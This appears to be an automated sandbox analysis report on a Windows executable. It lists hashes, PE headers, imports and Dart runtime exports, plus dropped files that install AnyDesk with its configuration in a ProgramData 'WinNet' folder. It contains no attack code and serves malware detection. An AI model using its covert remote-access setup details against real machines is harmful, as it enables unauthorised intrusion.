                                                                                                                                                                                                                                                Preview:ad.anynet.alias=.ad.anynet.client_stats_hash=5b0dbc4ca0c9e3f20d4241ebe48432d8871b3ab8.ad.anynet.cur_version=34359738376.ad.anynet.fpr=d78d81a2777faf1ddc8912c113f6edad0ae211e6.ad.anynet.id=1244526401.ad.anynet.last_relay=relay-6a630189.net.anydesk.com:80:443:6568.ad.anynet.network_hash=2038af04831d5c3d6443e0de15a3df48f2c757b0.ad.anynet.network_id=main.ad.anynet.relay.fatal_result=1.0.ad.anynet.relay.state=2.ad.license.name=free-1.ad.security.frontend_clipboard=1.ad.security.frontend_clipboard_files=1.ad.security.frontend_clipboard_version=1.ad.security.permission_profiles._default.permissions.sas=1.ad.security.permission_profiles._unattended_access.permissions.sas=1.ad.security.permission_profiles.version=1.ad.security.update_version=1.ad.wol.mac_hash=47dcfed10c8d0ae02cf11ad2a06fa0e5224153e3.
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3261)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7120
                                                                                                                                                                                                                                                Entropy (8bit):4.420049102935799
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:PW6L4Cd7HcigAxjfHYnOdDxnoux74ON0P3IG6n25/2wGqcN6iIF090xQy68:e6LHrcmuuWO3G62F2NN6HF097r8
                                                                                                                                                                                                                                                MD5:0E856F7CADDD59EE117BD3D6A2487ED1
                                                                                                                                                                                                                                                SHA1:4CD92A14BC83E212233E8448FDB16E660DADC186
                                                                                                                                                                                                                                                SHA-256:FC3962B90A6FF6FC3F1BB8113AE844117957462AD8111FFD1898715F806EE360
                                                                                                                                                                                                                                                SHA-512:6E3919BD44250CC9FD4A9BC931E669B296A88CD9940E82069CCBCD86FCD406FC768265B5C6A825000A5FA993DDB1D41EED345CE4F4C263B73EEC8A1BF0B7B9CE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3490
                                                                                                                                                                                                                                                Entropy (8bit):3.222604744442915
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:aLRi5ocAETmN7js0RXERYWoym5LRi5ocAEan9js0RXE+jDym+:MRKobETejsyoNoy2RKobEY9jsyry1
                                                                                                                                                                                                                                                MD5:B77E34467DB722A5CC54172DB45D1FD0
                                                                                                                                                                                                                                                SHA1:DFCD23CDCE7A057C32A36860EF599617C485AC67
                                                                                                                                                                                                                                                SHA-256:2A8612A46857BBEC9B0CEEF0FB00F60398B74497FED798378B7BED9132CBC9AE
                                                                                                                                                                                                                                                SHA-512:90C923DFC29CC277C4542369A4677A0682C1D0898AFC3F155BF8F38C3182AD75A1A4B558CEE121FF4FDBEBA060E683801F41B1384BF0CDF8D6AA7AB86AD33C2A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...................................FL..................F.@.. ...Z..fm...,L.fm...Z..fm..H.O.....................E....P.O. .:i.....+00.../C:\...................`.1.....cX.c. PROGRA~3..H......O.IcX.c....g......................` .P.r.o.g.r.a.m.D.a.t.a.....T.1.....cX.c. WinNet..>......cX.ccX.c..........................+X..W.i.n.N.e.t.....b.2.H.O.cX.c AnyDesk.exe.H......cX.ccX.c....i.....................+X..A.n.y.D.e.s.k...e.x.e.......P...............-.......O............w_0.....C:\ProgramData\WinNet\AnyDesk.exe....O.p.e.n. .a. .n.e.w. .A.n.y.D.e.s.k. .w.i.n.d.o.w...!.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.W.i.n.N.e.t.\.A.n.y.D.e.s.k...e.x.e.........%ALLUSERSPROFILE%\WinNet\AnyDesk.exe................................................................................................................................................................................................................................%.A.L.L.U.S.E.R.S.P.R.O.F.I.L.E.%.\.W.i.n.N.e.t.\.A.n.y.D.e.s.k...e.x.e....................
                                                                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):6.397360951799639
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:SysrI6zSkJ.exe
                                                                                                                                                                                                                                                File size:21'906'944 bytes
                                                                                                                                                                                                                                                MD5:2e501240ec8b9aab46d76a6504e44882
                                                                                                                                                                                                                                                SHA1:1a97d7662e66502faa5a7718565bb362eb6f27bd
                                                                                                                                                                                                                                                SHA256:582cf0470ba0d2c2ef2c3fee83442db0e345656f7d7c46ee5b613998fdd6ee00
                                                                                                                                                                                                                                                SHA512:eae4aacbfcee43ad8f9b2acbddb1b3b71c2aec0064bc6605107eb8b254614361c77984d09e7eabb91fc26634822ac448d8be884dd8f174021c52979690c2f97b
                                                                                                                                                                                                                                                SSDEEP:98304:Kj1ZAxOCU3yUetDvB6ti3FOU8jRdqY9d2omTt20+NVZ:mAxOCU3yUetDvB6ti1aOTtlcVZ
                                                                                                                                                                                                                                                TLSH:C527D03287433CF9D86C5936D0262E155E78368BCB25A1CFEBC424772FAEDC48D29661
                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a(J(%I${%I${%I${.9'z=I${.9!z.I${C&.{,I${w<!zvI${w< z6I${w<'z)I${.9 z.I${.9%z>I${%I%{)H${%I${AM${.<$z$I${.<.{$I${.<&z$I${Rich%I$
                                                                                                                                                                                                                                                Icon Hash:1765839997876d37
                                                                                                                                                                                                                                                Entrypoint:0x1402634e4
                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x65C29ABB [Tue Feb 6 20:46:51 2024 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:0x4018cd80, 0x1, 0x4009cf00, 0x1
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                OS Version Minor:2
                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                File Version Minor:2
                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                Subsystem Version Minor:2
                                                                                                                                                                                                                                                Import Hash:9576feaee7c50f81d281a6149bed248d
                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                                call 00007FA25CEF6F18h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                                jmp 00007FA25CEF6577h
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                inc eax
                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                sub esp, 20h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov ebx, ecx
                                                                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                                                                call dword ptr [0003AD3Fh]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov ecx, ebx
                                                                                                                                                                                                                                                call dword ptr [0003B04Eh]
                                                                                                                                                                                                                                                call dword ptr [0003ADB0h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov ecx, eax
                                                                                                                                                                                                                                                mov edx, C0000409h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                add esp, 20h
                                                                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                jmp dword ptr [0003AD8Ch]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                sub esp, 38h
                                                                                                                                                                                                                                                mov ecx, 00000017h
                                                                                                                                                                                                                                                call dword ptr [0003B028h]
                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                je 00007FA25CEF6709h
                                                                                                                                                                                                                                                mov ecx, 00000002h
                                                                                                                                                                                                                                                int 29h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                lea ecx, dword ptr [0014B62Eh]
                                                                                                                                                                                                                                                call 00007FA25CEF68CEh
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [0014B715h], eax
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                add eax, 08h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [0014B6A5h], eax
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov eax, dword ptr [0014B6FEh]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [0014B56Fh], eax
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov eax, dword ptr [esp+40h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [0014B673h], eax
                                                                                                                                                                                                                                                mov dword ptr [0014B549h], C0000409h
                                                                                                                                                                                                                                                mov dword ptr [0014B543h], 00000001h
                                                                                                                                                                                                                                                mov dword ptr [0014B54Dh], 00000001h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x39f100 | 0x26d8 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3a17d8 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c7000 | 0x10ab5 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x3b1000 | 0x147a8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3d8000 | 0xa0e8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x398a18 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x398c00 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x398a70 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x29e000 | 0x790 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29ce34 | 0x29d000 | 540077970aa66d75d4e97e3a6080936c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x29e000 | 0x1050ee | 0x105200 | ec7e77069345beb6fd4280abff24481e | False | 0.3736228084609861 | data | 6.1960997863784755 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3a4000 | 0xc21c | 0x4200 | 8224b3809e97cfd4c4ab01b6d66b1871 | False | 0.181640625 | data | 3.794800668027772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x3b1000 | 0x147a8 | 0x14800 | 211a9e14a91d5aed26341c803e945f7a | False | 0.4945931783536585 | data | 6.021656628421719 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x3c6000 | 0xfc | 0x200 | e6b9c002c7370fb9390f6d78a24e5375 | False | 0.326171875 | data | 2.4706336560932725 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3c7000 | 0x10ab5 | 0x10c00 | 88f1cf54e2672a8cf3b7a789982939fc | False | 0.08477145522388059 | data | 3.699073812667143 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x3d8000 | 0xa0e8 | 0xa200 | 31614008b9578caeea7592d554cef0f2 | False | 0.15048707561728394 | data | 5.449275206873749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
snapshot | 0x3e3000 | 0x110e4c0 | 0x110e600 | 828acc69034bc21f6c78e11157c4ef6e | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_DISCARDABLE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3c70fc | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.08026736070034307
RT_GROUP_ICON | 0x3d7924 | 0x14 | data | | | 1.15
RT_MANIFEST | 0x3d7938 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
ole32.dll | CoTaskMemFree, CoTaskMemAlloc
IPHLPAPI.DLL | GetAdaptersAddresses
PSAPI.DLL | GetProcessMemoryInfo, EnumProcessModules
WS2_32.dll | socket, WSARecv, WSASend, getsockopt, WSAGetLastError, WSASetLastError, WSAIoctl, closesocket, setsockopt, send, recv, ioctlsocket, connect, WSASocketW, listen, bind, WSASendTo, InetNtopW, InetPtonW, getnameinfo, freeaddrinfo, getaddrinfo, getpeername, getsockname, WSAStartup, WSAAddressToStringW, ntohs, htons, gethostname, WSARecvFrom, shutdown
RPCRT4.dll | UuidCreateSequential, UuidToStringW, RpcStringFreeW
SHLWAPI.dll | UrlIsW, PathCreateFromUrlW
ADVAPI32.dll | RegGetValueW
SHELL32.dll | CommandLineToArgvW
dbghelp.dll | SymCleanup, SymInitialize, SymSetOptions
bcrypt.dll | BCryptGenRandom
CRYPT32.dll | CertEnumCertificatesInStore, CertFreeCertificateContext, CertCloseStore, CertOpenStore
KERNEL32.dll | GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, HeapAlloc, HeapFree, GetCommandLineA, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, SystemTimeToFileTime, TzSpecificLocalTimeToSystemTime, CreatePipe, DuplicateHandle, EnumSystemLocalesW, GetDriveTypeW, ReadConsoleW, RaiseException, GetCPInfo, GetStringTypeW, LCMapStringEx, DecodePointer, EncodePointer, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, SetEnvironmentVariableW, GetProcessHeap, HeapReAlloc, GetFileSizeEx, WriteConsoleW, PeekNamedPipe, GetTempPathW, InitOnceExecuteOnce, SetConsoleCtrlHandler, GetConsoleOutputCP, GetConsoleCP, SetConsoleOutputCP, SetConsoleCP, GetStdHandle, GetConsoleMode, SetConsoleMode, MultiByteToWideChar, CreateFileW, SetStdHandle, CreateIoCompletionPort, CancelIoEx, CloseHandle, WaitForSingleObject, OpenThread, GetFileType, ReadFile, PostQueuedCompletionStatus, GetLastError, WriteFile, SetLastError, ReadDirectoryChangesW, GetQueuedCompletionStatus, GetCurrentDirectoryW, SetCurrentDirectoryW, SetErrorMode, SetUnhandledExceptionFilter, GetSystemInfo, GetUserDefaultLocaleName, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, WideCharToMultiByte, ExitProcess, GetModuleHandleW, GetProcAddress, CreateProcessW, CreateEventW, WaitForMultipleObjects, OpenProcess, TerminateProcess, GetCurrentProcessId, GetCurrentProcess, CreateNamedPipeW, RegisterWaitForSingleObject, UnregisterWait, GetExitCodeProcess, GetConsoleScreenBufferInfo, LoadLibraryExW, FreeLibrary, LoadLibraryW, FormatMessageA, LocalFree, VirtualAlloc, VirtualFree, VirtualProtect, InitializeSRWLock, AcquireSRWLockShared, AcquireSRWLockExclusive, ReleaseSRWLockShared, ReleaseSRWLockExclusive, TlsGetValue, TlsAlloc, TlsSetValue, FindNextFileW, FindFirstFileW, GetFileInformationByHandle, FindClose, GetFileAttributesW, CreateDirectoryW, HeapSize, RemoveDirectoryW, MoveFileExW, DeleteFileW, SetFileAttributesW, SetFilePointerEx, SetEndOfFile, FlushFileBuffers, LockFileEx, UnlockFileEx, GetFullPathNameW, CreateSymbolicLinkW, CopyFileExW, MoveFileW, DeviceIoControl, SetFileTime, GetFinalPathNameByHandleW, GetCurrentThreadId, TryAcquireSRWLockExclusive, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, SleepConditionVariableCS, WakeConditionVariable, WakeAllConditionVariable, FormatMessageW, GetCommandLineW, QueryPerformanceFrequency, QueryPerformanceCounter, GetSystemTimeAsFileTime, Sleep, GetCurrentThread, SetThreadPriority, TlsFree, VirtualQuery, SleepConditionVariableSRW, GetTimeZoneInformation, FileTimeToSystemTime, GetTimeZoneInformationForYear, SystemTimeToTzSpecificLocalTime, GetLocaleInfoEx, CreateFileA, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, WaitForSingleObjectEx, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, InitOnceBeginInitialize, InitializeCriticalSectionEx, TryEnterCriticalSection, InitOnceComplete, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree
ntdll.dll | RtlUnwindEx, RtlUnwind, RtlPcToFileHeader
Name | Ordinal | Address
Dart_AddSymbols | 1 | 0x140242a30
Dart_Allocate | 2 | 0x140256d60
Dart_AllocateWithNativeFields | 3 | 0x140257380
Dart_BooleanValue | 4 | 0x14024ccb0
Dart_ClassLibrary | 5 | 0x14024a640
Dart_ClassName | 6 | 0x140249860
Dart_Cleanup | 7 | 0x140241430
Dart_CloseNativePort | 8 | 0x140262630
Dart_ClosureFunction | 9 | 0x14024a2d0
Dart_CompileAll | 10 | 0x140262700
Dart_CompileToKernel | 11 | 0x140260ca0
Dart_CopyUTF8EncodingOfString | 12 | 0x14024ed90
Dart_CreateAppAOTSnapshotAsAssemblies | 13 | 0x140260e20
Dart_CreateAppAOTSnapshotAsAssembly | 14 | 0x140260e20
Dart_CreateAppAOTSnapshotAsElf | 15 | 0x140260e00
Dart_CreateAppAOTSnapshotAsElfs | 16 | 0x140260e00
Dart_CreateAppJITSnapshotAsBlobs | 17 | 0x140260e40
Dart_CreateCoreJITSnapshotAsBlobs | 18 | 0x140260e40
Dart_CreateIsolateGroup | 19 | 0x140241ae0
Dart_CreateIsolateGroupFromKernel | 20 | 0x140241c70
Dart_CreateIsolateInGroup | 21 | 0x140241e40
Dart_CreateSnapshot | 22 | 0x140243770
Dart_CreateVMAOTSnapshotAsAssembly | 23 | 0x140260e20
Dart_CurrentIsolate | 24 | 0x1402421b0
Dart_CurrentIsolateData | 25 | 0x1402421e0
Dart_CurrentIsolateGroup | 26 | 0x1402422f0
Dart_CurrentIsolateGroupData | 27 | 0x140242320
Dart_CurrentIsolateGroupId | 28 | 0x1402423b0
Dart_DebugName | 29 | 0x1402424c0
Dart_DebugNameToCString | 30 | 0x140242780
Dart_DefaultCanonicalizeUrl | 31 | 0x14025c630
Dart_DeferredLoadComplete | 32 | 0x14025f850
Dart_DeferredLoadCompleteError | 33 | 0x14025fc80
Dart_DeleteFinalizableHandle | 34 | 0x140241160
Dart_DeletePersistentHandle | 35 | 0x140240d70
Dart_DeleteWeakPersistentHandle | 36 | 0x140240f60
Dart_DetectNullSafety | 37 | 0x140260d20
Dart_DisableHeapSampling | 38 | 0x140004e80
Dart_DoubleValue | 39 | 0x14024c340
Dart_DumpNativeStackTrace | 40 | 0x140004e80
Dart_EmptyString | 41 | 0x140245ae0
Dart_EnableHeapSampling | 42 | 0x140004e80
Dart_EnterIsolate | 43 | 0x1402428e0
Dart_EnterScope | 44 | 0x140245570
Dart_ErrorGetException | 45 | 0x14023e840
Dart_ErrorGetStackTrace | 46 | 0x14023eb30
Dart_ErrorHasException | 47 | 0x14023e640
Dart_ExecuteInternalCommand | 48 | 0x140262760
Dart_ExitIsolate | 49 | 0x140243690
Dart_ExitScope | 50 | 0x1402456f0
Dart_False | 51 | 0x14024cc00
Dart_FinalizeAllClasses | 52 | 0x140262730
Dart_FinalizeLoading | 53 | 0x14025f5d0
Dart_FunctionIsStatic | 54 | 0x140249ff0
Dart_FunctionName | 55 | 0x1402494f0
Dart_FunctionOwner | 56 | 0x140249c10
Dart_GetClass | 57 | 0x14025d0a0
Dart_GetCurrentUserTag | 58 | 0x140260e90
Dart_GetDataFromByteBuffer | 59 | 0x140255f20
Dart_GetDefaultUserTag | 60 | 0x140261120
Dart_GetError | 61 | 0x14023e320
Dart_GetField | 62 | 0x140258b90
Dart_GetLoadedLibraries | 63 | 0x14025eb40
Dart_GetMainPortId | 64 | 0x1402454d0
Dart_GetMessageNotifyCallback | 65 | 0x140243a10
Dart_GetNativeArgument | 66 | 0x14025b0d0
Dart_GetNativeArgumentCount | 67 | 0x14025b3e0
Dart_GetNativeArguments | 68 | 0x14025a7e0
Dart_GetNativeBooleanArgument | 69 | 0x14025b820
Dart_GetNativeDoubleArgument | 70 | 0x14025b8b0
Dart_GetNativeFieldsOfArgument | 71 | 0x14025b400
Dart_GetNativeInstanceField | 72 | 0x14025a170
Dart_GetNativeInstanceFieldCount | 73 | 0x140259ea0
Dart_GetNativeIntegerArgument | 74 | 0x14025b790
Dart_GetNativeIsolateGroupData | 75 | 0x14025a7c0
Dart_GetNativeReceiver | 76 | 0x14025b490
Dart_GetNativeResolver | 77 | 0x14025ff70
Dart_GetNativeStringArgument | 78 | 0x14025b610
Dart_GetNativeSymbol | 79 | 0x140260250
Dart_GetNonNullableType | 80 | 0x14025ddb0
Dart_GetNullableType | 81 | 0x14025dd90
Dart_GetObfuscationMap | 82 | 0x140260e60
Dart_GetPeer | 83 | 0x1402607e0
                                                                                                                                                                                                                                                Dart_GetStaticMethodClosure840x14024c600
                                                                                                                                                                                                                                                Dart_GetStickyError850x140242f50
                                                                                                                                                                                                                                                Dart_GetType860x14025d5f0
                                                                                                                                                                                                                                                Dart_GetTypeOfExternalTypedData870x140254110
                                                                                                                                                                                                                                                Dart_GetTypeOfTypedData880x140253f50
                                                                                                                                                                                                                                                Dart_GetUserTagLabel890x1402619f0
                                                                                                                                                                                                                                                Dart_HandleFromPersistent900x14023ff70
                                                                                                                                                                                                                                                Dart_HandleFromWeakPersistent910x1402401b0
                                                                                                                                                                                                                                                Dart_HandleMessage920x1402442b0
                                                                                                                                                                                                                                                Dart_HandleServiceMessages930x140011c20
                                                                                                                                                                                                                                                Dart_HasLivePorts940x140244c70
                                                                                                                                                                                                                                                Dart_HasServiceMessages950x1400014c0
                                                                                                                                                                                                                                                Dart_HasStickyError960x140242eb0
                                                                                                                                                                                                                                                Dart_IdentityEquals970x14023fd30
                                                                                                                                                                                                                                                Dart_Initialize980x140241400
                                                                                                                                                                                                                                                Dart_InstanceGetType990x140249160
                                                                                                                                                                                                                                                Dart_IntegerFitsIntoInt641000x14024a960
                                                                                                                                                                                                                                                Dart_IntegerFitsIntoUint641010x14024ac10
                                                                                                                                                                                                                                                Dart_IntegerToHexCString1020x14024bd90
                                                                                                                                                                                                                                                Dart_IntegerToInt641030x14024b7b0
                                                                                                                                                                                                                                                Dart_IntegerToUint641040x14024ba80
                                                                                                                                                                                                                                                Dart_Invoke1050x1402580b0
                                                                                                                                                                                                                                                Dart_InvokeClosure1060x1402586f0
                                                                                                                                                                                                                                                Dart_InvokeConstructor1070x1402577f0
                                                                                                                                                                                                                                                Dart_InvokeVMServiceMethod1080x1402626d0
                                                                                                                                                                                                                                                Dart_IsApiError1090x14023dbe0
                                                                                                                                                                                                                                                Dart_IsBoolean1100x1402471c0
                                                                                                                                                                                                                                                Dart_IsByteBuffer1110x140248d00
                                                                                                                                                                                                                                                Dart_IsClosure1120x140248720
                                                                                                                                                                                                                                                Dart_IsCompilationError1130x14023dea0
                                                                                                                                                                                                                                                Dart_IsDouble1140x140247020
                                                                                                                                                                                                                                                Dart_IsError1150x14023da10
                                                                                                                                                                                                                                                Dart_IsExternalString1160x1402476a0
                                                                                                                                                                                                                                                Dart_IsFatalError1170x14023e1c0
                                                                                                                                                                                                                                                Dart_IsFunction1180x140248240
                                                                                                                                                                                                                                                Dart_IsFuture1190x140248ea0
                                                                                                                                                                                                                                                Dart_IsInstance1200x140246b00
                                                                                                                                                                                                                                                Dart_IsInteger1210x140246e80
                                                                                                                                                                                                                                                Dart_IsKernel1220x140243790
                                                                                                                                                                                                                                                Dart_IsKernelIsolate1230x1400014c0
                                                                                                                                                                                                                                                Dart_IsLegacyType1240x14025e450
                                                                                                                                                                                                                                                Dart_IsLibrary1250x140247ef0
                                                                                                                                                                                                                                                Dart_IsList1260x140247840
                                                                                                                                                                                                                                                Dart_IsMap1270x140247bb0
                                                                                                                                                                                                                                                Dart_IsNonNullableType1280x14025e440
                                                                                                                                                                                                                                                Dart_IsNull1290x140245990
                                                                                                                                                                                                                                                Dart_IsNullableType1300x14025e170
                                                                                                                                                                                                                                                Dart_IsNumber1310x140246ce0
                                                                                                                                                                                                                                                Dart_IsPausedOnExit1320x1400014c0
                                                                                                                                                                                                                                                Dart_IsPausedOnStart1330x1400014c0
                                                                                                                                                                                                                                                Dart_IsPrecompiledRuntime1340x140011c20
                                                                                                                                                                                                                                                Dart_IsReloading1350x1400014c0
                                                                                                                                                                                                                                                Dart_IsServiceIsolate1360x1400014c0
                                                                                                                                                                                                                                                Dart_IsString1370x140247360
                                                                                                                                                                                                                                                Dart_IsStringLatin11380x140247500
                                                                                                                                                                                                                                                Dart_IsTearOff1390x1402488c0
                                                                                                                                                                                                                                                Dart_IsType1400x140248090
                                                                                                                                                                                                                                                Dart_IsTypeVariable1410x140248580
                                                                                                                                                                                                                                                Dart_IsTypedData1420x140248ae0
                                                                                                                                                                                                                                                Dart_IsUnhandledExceptionError1430x14023dd40
                                                                                                                                                                                                                                                Dart_IsVMFlagSet1440x1402414d0
                                                                                                                                                                                                                                                Dart_IsVariable1450x1402483e0
                                                                                                                                                                                                                                                Dart_IsolateData1460x140242280
                                                                                                                                                                                                                                                Dart_IsolateFlagsInitialize1470x140241ad0
                                                                                                                                                                                                                                                Dart_IsolateGroupData1480x140242450
                                                                                                                                                                                                                                                Dart_IsolateGroupHeapNewCapacityMetric1490x1402416e0
                                                                                                                                                                                                                                                Dart_IsolateGroupHeapNewExternalMetric1500x140241760
                                                                                                                                                                                                                                                Dart_IsolateGroupHeapNewUsedMetric1510x140241660
                                                                                                                                                                                                                                                Dart_IsolateGroupHeapOldCapacityMetric1520x140241560
                                                                                                                                                                                                                                                Dart_IsolateGroupHeapOldExternalMetric1530x1402415e0
                                                                                                                                                                                                                                                Dart_IsolateGroupHeapOldUsedMetric1540x1402414e0
                                                                                                                                                                                                                                                Dart_IsolateMakeRunnable1550x1402437c0
                                                                                                                                                                                                                                                Dart_IsolateRunnableHeapSizeMetric1560x14015aeb0
                                                                                                                                                                                                                                                Dart_IsolateRunnableLatencyMetric1570x14015aeb0
                                                                                                                                                                                                                                                Dart_IsolateServiceId1580x140242860
                                                                                                                                                                                                                                                Dart_KernelIsolateIsRunning1590x1400014c0
                                                                                                                                                                                                                                                Dart_KernelListDependencies1600x140260ce0
                                                                                                                                                                                                                                                Dart_KernelPort1610x1400014c0
                                                                                                                                                                                                                                                Dart_KillIsolate1620x14023db70
                                                                                                                                                                                                                                                Dart_LibraryHandleError1630x14025f220
                                                                                                                                                                                                                                                Dart_LibraryResolvedUrl1640x14025e7c0
                                                                                                                                                                                                                                                Dart_LibraryUrl1650x14025e460
                                                                                                                                                                                                                                                Dart_ListGetAsBytes1660x1402520a0
                                                                                                                                                                                                                                                Dart_ListGetAt1670x140250e60
                                                                                                                                                                                                                                                Dart_ListGetRange1680x140251350
                                                                                                                                                                                                                                                Dart_ListLength1690x1402509b0
                                                                                                                                                                                                                                                Dart_ListSetAsBytes1700x140252db0
                                                                                                                                                                                                                                                Dart_ListSetAt1710x140251af0
                                                                                                                                                                                                                                                Dart_LoadELF1720x140026430
                                                                                                                                                                                                                                                Dart_LoadELF_Memory1730x140026520
                                                                                                                                                                                                                                                Dart_LoadLibrary1740x14025f5b0
                                                                                                                                                                                                                                                Dart_LoadLibraryFromKernel1750x14025f590
